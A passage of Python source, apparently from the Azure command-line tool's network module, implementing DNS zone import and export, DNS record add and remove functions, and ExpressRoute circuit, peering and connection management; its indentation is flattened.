def update_dns_record_set(instance, cmd, metadata=None, target_resource=None):
if metadata is not None:
instance.metadata = metadata
if target_resource == '':
instance.target_resource = None
elif target_resource is not None:
SubResource = cmd.get_models('SubResource')
instance.target_resource = SubResource(id=target_resource)
return instance
def _type_to_property_name(key):
type_dict = {
'a': 'a_records',
'aaaa': 'aaaa_records',
'caa': 'caa_records',
'cname': 'cname_record',
'mx': 'mx_records',
'ns': 'ns_records',
'ptr': 'ptr_records',
'soa': 'soa_record',
'spf': 'txt_records',
'srv': 'srv_records',
'txt': 'txt_records',
}
return type_dict[key.lower()]
def export_zone(cmd, resource_group_name, zone_name, file_name=None):
from time import localtime, strftime
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
record_sets = client.record_sets.list_by_dns_zone(resource_group_name, zone_name)
zone_obj = OrderedDict({
'$origin': zone_name.rstrip('.') + '.',
'resource-group': resource_group_name,
'zone-name': zone_name.rstrip('.'),
'datetime': strftime('%a, %d %b %Y %X %z', localtime())
})
for record_set in record_sets:
record_type = record_set.type.rsplit('/', 1)[1].lower()
record_set_name = record_set.name
record_data = getattr(record_set, _type_to_property_name(record_type), None)
# ignore empty record sets
if not record_data:
continue
if not isinstance(record_data, list):
record_data = [record_data]
if record_set_name not in zone_obj:
zone_obj[record_set_name] = OrderedDict()
for record in record_data:
record_obj = {'ttl': record_set.ttl}
if record_type not in zone_obj[record_set_name]:
zone_obj[record_set_name][record_type] = []
if record_type == 'aaaa':
record_obj.update({'ip': record.ipv6_address})
elif record_type == 'a':
record_obj.update({'ip': record.ipv4_address})
elif record_type == 'caa':
record_obj.update({'val': record.value, 'tag': record.tag, 'flags': record.flags})
elif record_type == 'cname':
record_obj.update({'alias': record.cname.rstrip('.') + '.'})
elif record_type == 'mx':
record_obj.update({'preference': record.preference, 'host': record.exchange.rstrip('.') + '.'})
elif record_type == 'ns':
record_obj.update({'host': record.nsdname.rstrip('.') + '.'})
elif record_type == 'ptr':
record_obj.update({'host': record.ptrdname.rstrip('.') + '.'})
elif record_type == 'soa':
record_obj.update({
'mname': record.host.rstrip('.') + '.',
'rname': record.email.rstrip('.') + '.',
'serial': int(record.serial_number), 'refresh': record.refresh_time,
'retry': record.retry_time, 'expire': record.expire_time,
'minimum': record.minimum_ttl
})
zone_obj['$ttl'] = record.minimum_ttl
elif record_type == 'srv':
record_obj.update({'priority': record.priority, 'weight': record.weight,
'port': record.port, 'target': record.target.rstrip('.') + '.'})
elif record_type == 'txt':
record_obj.update({'txt': ''.join(record.value)})
zone_obj[record_set_name][record_type].append(record_obj)
zone_file_content = make_zone_file(zone_obj)
print(zone_file_content)
if file_name:
try:
with open(file_name, 'w') as f:
f.write(zone_file_content)
except IOError:
raise CLIError('Unable to export to file: {}'.format(file_name))
# pylint: disable=too-many-return-statements, inconsistent-return-statements
def _build_record(cmd, data):
AaaaRecord, ARecord, CaaRecord, CnameRecord, MxRecord, NsRecord, PtrRecord, SoaRecord, SrvRecord, TxtRecord = \
cmd.get_models('AaaaRecord', 'ARecord', 'CaaRecord', 'CnameRecord', 'MxRecord', 'NsRecord',
'PtrRecord', 'SoaRecord', 'SrvRecord', 'TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_type = data['delim'].lower()
try:
if record_type == 'aaaa':
return AaaaRecord(ipv6_address=data['ip'])
if record_type == 'a':
return ARecord(ipv4_address=data['ip'])
if (record_type == 'caa' and
supported_api_version(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS, min_api='2018-03-01-preview')):
return CaaRecord(value=data['val'], flags=int(data['flags']), tag=data['tag'])
if record_type == 'cname':
return CnameRecord(cname=data['alias'])
if record_type == 'mx':
return MxRecord(preference=data['preference'], exchange=data['host'])
if record_type == 'ns':
return NsRecord(nsdname=data['host'])
if record_type == 'ptr':
return PtrRecord(ptrdname=data['host'])
if record_type == 'soa':
return SoaRecord(host=data['host'], email=data['email'], serial_number=data['serial'],
refresh_time=data['refresh'], retry_time=data['retry'], expire_time=data['expire'],
minimum_ttl=data['minimum'])
if record_type == 'srv':
return SrvRecord(
priority=int(data['priority']), weight=int(data['weight']), port=int(data['port']),
target=data['target'])
if record_type in ['txt', 'spf']:
text_data = data['txt']
return TxtRecord(value=text_data) if isinstance(text_data, list) else TxtRecord(value=[text_data])
except KeyError as ke:
raise CLIError("The {} record '{}' is missing a property. {}"
.format(record_type, data['name'], ke))
# pylint: disable=too-many-statements
def import_zone(cmd, resource_group_name, zone_name, file_name):
from azure.cli.core.util import read_file_content
from azure.core.exceptions import HttpResponseError
import sys
logger.warning("In the future, zone name will be case insensitive.")
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
from azure.cli.core.azclierror import FileOperationError, UnclassifiedUserFault
try:
file_text = read_file_content(file_name)
except FileNotFoundError:
raise FileOperationError("No such file: " + str(file_name))
except IsADirectoryError:
raise FileOperationError("Is a directory: " + str(file_name))
except PermissionError:
raise FileOperationError("Permission denied: " + str(file_name))
except OSError as e:
raise UnclassifiedUserFault(e)
zone_obj = parse_zone_file(file_text, zone_name)
origin = zone_name
record_sets = {}
for record_set_name in zone_obj:
for record_set_type in zone_obj[record_set_name]:
record_set_obj = zone_obj[record_set_name][record_set_type]
if record_set_type == 'soa':
origin = record_set_name.rstrip('.')
if not isinstance(record_set_obj, list):
record_set_obj = [record_set_obj]
for entry in record_set_obj:
record_set_ttl = entry['ttl']
record_set_key = '{}{}'.format(record_set_name.lower(), record_set_type)
record = _build_record(cmd, entry)
if not record:
logger.warning('Cannot import %s. RecordType is not found. Skipping...', entry['delim'].lower())
continue
record_set = record_sets.get(record_set_key, None)
if not record_set:
# Workaround for issue #2824
relative_record_set_name = record_set_name.rstrip('.')
if not relative_record_set_name.endswith(origin):
logger.warning(
'Cannot import %s. Only records relative to origin may be '
'imported at this time. Skipping...', relative_record_set_name)
continue
record_set = RecordSet(ttl=record_set_ttl)
record_sets[record_set_key] = record_set
_add_record(record_set, record, record_set_type,
is_list=record_set_type.lower() not in ['soa', 'cname'])
total_records = 0
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = rs_name[:-(len(origin) + 1)] if rs_name != origin else '@'
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
total_records += record_count
cum_records = 0
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
print('== BEGINNING ZONE IMPORT: {} ==\n'.format(zone_name), file=sys.stderr)
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
client.zones.create_or_update(resource_group_name, zone_name, Zone(location='global'))
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = '@' if rs_name == origin else rs_name
if rs_name.endswith(origin):
rs_name = rs_name[:-(len(origin) + 1)]
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
if rs_name == '@' and rs_type == 'soa':
root_soa = client.record_sets.get(resource_group_name, zone_name, '@', 'SOA')
rs.soa_record.host = root_soa.soa_record.host
rs_name = '@'
elif rs_name == '@' and rs_type == 'ns':
root_ns = client.record_sets.get(resource_group_name, zone_name, '@', 'NS')
root_ns.ttl = rs.ttl
rs = root_ns
rs_type = rs.type.rsplit('/', 1)[1]
try:
client.record_sets.create_or_update(
resource_group_name, zone_name, rs_name, rs_type, rs)
cum_records += record_count
print("({}/{}) Imported {} records of type '{}' and name '{}'"
.format(cum_records, total_records, record_count, rs_type, rs_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print("\n== {}/{} RECORDS IMPORTED SUCCESSFULLY: '{}' =="
.format(cum_records, total_records, zone_name), file=sys.stderr)
def add_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
ttl=3600, if_none_match=None):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
ttl=3600, if_none_match=None):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name, 'arecords',
ttl=ttl, if_none_match=if_none_match)
def add_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value, flags, tag,
ttl=3600, if_none_match=None):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname, ttl=3600, if_none_match=None):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, ttl=ttl, if_none_match=if_none_match)
def add_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
ttl=3600, if_none_match=None):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
subscription_id=None, ttl=3600, if_none_match=None):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
subscription_id=subscription_id, ttl=ttl, if_none_match=if_none_match)
def add_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname, ttl=3600, if_none_match=None):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def update_dns_soa_record(cmd, resource_group_name, zone_name, host=None, email=None,
serial_number=None, refresh_time=None, retry_time=None, expire_time=None,
minimum_ttl=3600, if_none_match=None):
record_set_name = '@'
record_type = 'soa'
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record = record_set.soa_record
record.host = host or record.host
record.email = email or record.email
record.serial_number = serial_number or record.serial_number
record.refresh_time = refresh_time or record.refresh_time
record.retry_time = retry_time or record.retry_time
record.expire_time = expire_time or record.expire_time
record.minimum_ttl = minimum_ttl or record.minimum_ttl
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, if_none_match=if_none_match)
def add_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, if_none_match=None):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def add_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value, if_none_match=None):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
long_text = ''.join(x for x in record.value)
original_len = len(long_text)
record.value = []
while len(long_text) > 255:
record.value.append(long_text[:255])
long_text = long_text[255:]
record.value.append(long_text)
final_str = ''.join(record.value)
final_len = len(final_str)
assert original_len == final_len
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def remove_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
keep_empty_record_set=False):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
keep_empty_record_set=False):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value,
flags, tag, keep_empty_record_set=False):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname,
keep_empty_record_set=False):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, keep_empty_record_set=keep_empty_record_set)
def remove_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
keep_empty_record_set=False):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, keep_empty_record_set=False):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value,
keep_empty_record_set=False):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def _check_a_record_exist(record, exist_list):
for r in exist_list:
if r.ipv4_address == record.ipv4_address:
return True
return False
def _check_aaaa_record_exist(record, exist_list):
for r in exist_list:
if r.ipv6_address == record.ipv6_address:
return True
return False
def _check_caa_record_exist(record, exist_list):
for r in exist_list:
if (r.flags == record.flags and
r.tag == record.tag and
r.value == record.value):
return True
return False
def _check_cname_record_exist(record, exist_list):
for r in exist_list:
if r.cname == record.cname:
return True
return False
def _check_mx_record_exist(record, exist_list):
for r in exist_list:
if (r.preference == record.preference and
r.exchange == record.exchange):
return True
return False
def _check_ns_record_exist(record, exist_list):
for r in exist_list:
if r.nsdname == record.nsdname:
return True
return False
def _check_ptr_record_exist(record, exist_list):
for r in exist_list:
if r.ptrdname == record.ptrdname:
return True
return False
def _check_srv_record_exist(record, exist_list):
for r in exist_list:
if (r.priority == record.priority and
r.weight == record.weight and
r.port == record.port and
r.target == record.target):
return True
return False
def _check_txt_record_exist(record, exist_list):
for r in exist_list:
if r.value == record.value:
return True
return False
def _record_exist_func(record_type):
return globals()["_check_{}_record_exist".format(record_type)]
def _add_record(record_set, record, record_type, is_list=False):
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is None:
setattr(record_set, record_property, [])
record_list = getattr(record_set, record_property)
_record_exist = _record_exist_func(record_type)
if not _record_exist(record, record_list):
record_list.append(record)
else:
setattr(record_set, record_property, record)
def _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=True, subscription_id=None, ttl=None, if_none_match=None):
from azure.core.exceptions import HttpResponseError
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS,
subscription_id=subscription_id).record_sets
try:
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
except HttpResponseError:
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_set = RecordSet(ttl=3600)
if ttl is not None:
record_set.ttl = ttl
_add_record(record_set, record, record_type, is_list)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name,
record_type, record_set,
if_none_match='*' if if_none_match else None)
def _remove_record(cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set, is_list=True):
ncf = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is not None:
keep_list = [r for r in record_list
if not dict_matches_filter(r.__dict__, record.__dict__)]
if len(keep_list) == len(record_list):
raise CLIError('Record {} not found.'.format(str(record)))
setattr(record_set, record_property, keep_list)
else:
setattr(record_set, record_property, None)
if is_list:
records_remaining = len(getattr(record_set, record_property))
else:
records_remaining = 1 if getattr(record_set, record_property) is not None else 0
if not records_remaining and not keep_empty_record_set:
logger.info('Removing empty %s record set: %s', record_type, record_set_name)
return ncf.delete(resource_group_name, zone_name, record_set_name, record_type)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name, record_type, record_set)
def dict_matches_filter(d, filter_dict):
sentinel = object()
return all(not filter_dict.get(key, None) or
str(filter_dict[key]) == str(d.get(key, sentinel)) or
lists_match(filter_dict[key], d.get(key, []))
for key in filter_dict)
def lists_match(l1, l2):
try:
return Counter(l1) == Counter(l2) # pylint: disable=too-many-function-args
except TypeError:
return False
# endregion
# region ExpressRoutes
def create_express_route(cmd, circuit_name, resource_group_name, bandwidth_in_mbps, peering_location,
service_provider_name, location=None, tags=None, no_wait=False,
sku_family=None, sku_tier=None, allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
ExpressRouteCircuit, ExpressRouteCircuitSku, ExpressRouteCircuitServiceProviderProperties, SubResource = \
cmd.get_models(
'ExpressRouteCircuit', 'ExpressRouteCircuitSku', 'ExpressRouteCircuitServiceProviderProperties',
'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_circuits
sku_name = '{}_{}'.format(sku_tier, sku_family)
circuit = ExpressRouteCircuit(
location=location, tags=tags,
service_provider_properties=ExpressRouteCircuitServiceProviderProperties(
service_provider_name=service_provider_name,
peering_location=peering_location,
bandwidth_in_mbps=bandwidth_in_mbps if not express_route_port else None),
sku=ExpressRouteCircuitSku(name=sku_name, tier=sku_tier, family=sku_family),
allow_global_reach=allow_global_reach,
bandwidth_in_gbps=(int(bandwidth_in_mbps) / 1000) if express_route_port else None
)
if cmd.supported_api_version(min_api='2010-07-01') and allow_classic_operations is not None:
circuit.allow_classic_operations = allow_classic_operations
if cmd.supported_api_version(min_api='2018-08-01') and express_route_port:
circuit.express_route_port = SubResource(id=express_route_port)
circuit.service_provider_properties = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, circuit_name, circuit)
def update_express_route(instance, cmd, bandwidth_in_mbps=None, peering_location=None,
service_provider_name=None, sku_family=None, sku_tier=None, tags=None,
allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
with cmd.update_context(instance) as c:
c.set_param('allow_classic_operations', allow_classic_operations)
c.set_param('tags', tags)
c.set_param('allow_global_reach', allow_global_reach)
with cmd.update_context(instance.sku) as c:
c.set_param('family', sku_family)
c.set_param('tier', sku_tier)
with cmd.update_context(instance.service_provider_properties) as c:
c.set_param('peering_location', peering_location)
c.set_param('service_provider_name', service_provider_name)
if express_route_port is not None:
SubResource = cmd.get_models('SubResource')
instance.express_route_port = SubResource(id=express_route_port)
instance.service_provider_properties = None
if bandwidth_in_mbps is not None:
if not instance.express_route_port:
instance.service_provider_properties.bandwith_in_mbps = float(bandwidth_in_mbps)
else:
instance.bandwidth_in_gbps = (float(bandwidth_in_mbps) / 1000)
return instance
def create_express_route_peering_connection(cmd, resource_group_name, circuit_name, peering_name, connection_name,
peer_circuit, address_prefix, authorization_key=None):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
ExpressRouteCircuitConnection, SubResource = cmd.get_models('ExpressRouteCircuitConnection', 'SubResource')
source_circuit = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='expressRouteCircuits',
name=circuit_name,
child_type_1='peerings',
child_name_1=peering_name
)
conn = ExpressRouteCircuitConnection(
express_route_circuit_peering=SubResource(id=source_circuit),
peer_express_route_circuit_peering=SubResource(id=peer_circuit),
address_prefix=address_prefix,
authorization_key=authorization_key
)
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def _validate_ipv6_address_prefixes(prefixes):
from ipaddress import ip_network, IPv6Network
prefixes = prefixes if isinstance(prefixes, list) else [prefixes]
version = None
for prefix in prefixes:
try:
network = ip_network(prefix)
if version is None:
version = type(network)
else:
if not isinstance(network, version): # pylint: disable=isinstance-second-argument-not-valid-type
raise CLIError("usage error: '{}' incompatible mix of IPv4 and IPv6 address prefixes."
.format(prefixes))
except ValueError:
raise CLIError("usage error: prefix '{}' is not recognized as an IPv4 or IPv6 address prefix."
.format(prefix))
return version == IPv6Network
def create_express_route_peering(
cmd, client, resource_group_name, circuit_name, peering_type, peer_asn, vlan_id,
primary_peer_address_prefix, secondary_peer_address_prefix, shared_key=None,
advertised_public_prefixes=None, customer_asn=None, routing_registry_name=None,
route_filter=None, legacy_mode=None, ip_version='IPv4'):
(ExpressRouteCircuitPeering, ExpressRouteCircuitPeeringConfig, RouteFilter) = \
cmd.get_models('ExpressRouteCircuitPeering', 'ExpressRouteCircuitPeeringConfig', 'RouteFilter')
if cmd.supported_api_version(min_api='2018-02-01'):
ExpressRoutePeeringType = cmd.get_models('ExpressRoutePeeringType')
else:
ExpressRoutePeeringType = cmd.get_models('ExpressRouteCircuitPeeringType')
if ip_version == 'IPv6' and cmd.supported_api_version(min_api='2020-08-01'):
Ipv6ExpressRouteCircuitPeeringConfig = cmd.get_models('Ipv6ExpressRouteCircuitPeeringConfig')
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
microsoft_config = ExpressRouteCircuitPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
else:
microsoft_config = None
ipv6 = Ipv6ExpressRouteCircuitPeeringConfig(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
peering = ExpressRouteCircuitPeering(peering_type=peering_type, ipv6_peering_config=ipv6, peer_asn=peer_asn,
vlan_id=vlan_id)
else:
peering = ExpressRouteCircuitPeering(
peering_type=peering_type, peer_asn=peer_asn, vlan_id=vlan_id,
primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
shared_key=shared_key)
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
peering.microsoft_peering_config = ExpressRouteCircuitPeeringConfig(
advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
if cmd.supported_api_version(min_api='2016-12-01') and route_filter:
peering.route_filter = RouteFilter(id=route_filter)
if cmd.supported_api_version(min_api='2017-10-01') and legacy_mode is not None:
peering.microsoft_peering_config.legacy_mode = legacy_mode
return client.begin_create_or_update(resource_group_name, circuit_name, peering_type, peering)
def _create_or_update_ipv6_peering(cmd, config, primary_peer_address_prefix, secondary_peer_address_prefix,
route_filter, advertised_public_prefixes, customer_asn, routing_registry_name):
if config:
# update scenario
with cmd.update_context(config) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
if route_filter:
RouteFilter = cmd.get_models('RouteFilter')
config.route_filter = RouteFilter(id=route_filter)
else:
# create scenario
IPv6Config, MicrosoftPeeringConfig = cmd.get_models(
'Ipv6ExpressRouteCircuitPeeringConfig', 'ExpressRouteCircuitPeeringConfig')
microsoft_config = MicrosoftPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
config = IPv6Config(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
return config
def update_express_route_peering(cmd, instance, peer_asn=None, primary_peer_address_prefix=None,
secondary_peer_address_prefix=None, vlan_id=None, shared_key=None,
advertised_public_prefixes=None, customer_asn=None,
routing_registry_name=None, route_filter=None, ip_version='IPv4',
legacy_mode=None):
# update settings common to all peering types
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('vlan_id', vlan_id)
c.set_param('shared_key', shared_key)
if ip_version == 'IPv6':
# update is the only way to add IPv6 peering options
instance.ipv6_peering_config = _create_or_update_ipv6_peering(cmd, instance.ipv6_peering_config,
primary_peer_address_prefix,
secondary_peer_address_prefix, route_filter,
advertised_public_prefixes, customer_asn,
routing_registry_name)
else:
# IPv4 Microsoft Peering (or non-Microsoft Peering)
with cmd.update_context(instance) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
if route_filter is not None:
RouteFilter = cmd.get_models('RouteFilter')
instance.route_filter = RouteFilter(id=route_filter)
try:
with cmd.update_context(instance.microsoft_peering_config) as c:
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
c.set_param('legacy_mode', legacy_mode)
except AttributeError:
raise CLIError('--advertised-public-prefixes, --customer-asn, --routing-registry-name and '
'--legacy-mode are only applicable for Microsoft Peering.')
return instance
# endregion
# region ExpressRoute Connection
# pylint: disable=unused-argument
def create_express_route_connection(cmd, resource_group_name, express_route_gateway_name, connection_name,
peering, circuit_name=None, authorization_key=None, routing_weight=None,
enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
ExpressRouteConnection, SubResource, RoutingConfiguration, PropagatedRouteTable\
= cmd.get_models('ExpressRouteConnection', 'SubResource', 'RoutingConfiguration', 'PropagatedRouteTable')
client = network_client_factory(cmd.cli_ctx).express_route_connections
propagated_route_tables = PropagatedRouteTable(
labels=labels,
ids=[SubResource(id=propagated_route_table) for propagated_route_table in
propagated_route_tables] if propagated_route_tables else None
)
routing_configuration = RoutingConfiguration(
associated_route_table=SubResource(id=associated_route_table),
propagated_route_tables=propagated_route_tables
)
connection = ExpressRouteConnection(
name=connection_name,
express_route_circuit_peering=SubResource(id=peering) if peering else None,
authorization_key=authorization_key,
routing_weight=routing_weight,
routing_configuration=routing_configuration
)
if enable_internet_security and cmd.supported_api_version(min_api='2019-09-01'):
connection.enable_internet_security = enable_internet_security
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, connection_name, connection)
# pylint: disable=unused-argument
def update_express_route_connection(instance, cmd, circuit_name=None, peering=None, authorization_key=None,
routing_weight=None, enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
SubResource = cmd.get_models('SubResource')
if peering is not None:
instance.express_route_connection_id = SubResource(id=peering)
if authorization_key is not None:
instance.authorization_key = authorization_key
if routing_weight is not None:
instance.routing_weight = routing_weight
if enable_internet_security is not None and cmd.supported_api_version(min_api='2019-09-01'):
instance.enable_internet_security = enable_internet_security
if associated_route_table is not None or propagated_route_tables is not None or labels is not None:
if instance.routing_configuration is None:
RoutingConfiguration = cmd.get_models('RoutingConfiguration')
instance.routing_configuration = RoutingConfiguration()
if associated_route_table is not None:
instance.routing_configuration.associated_route_table = SubResource(id=associated_route_table)
if propagated_route_tables is not None or labels is not None:
if instance.routing_configuration.propagated_route_tables is None:
PropagatedRouteTable = cmd.get_models('PropagatedRouteTable')
instance.routing_configuration.propagated_route_tables = PropagatedRouteTable()
if propagated_route_tables is not None:
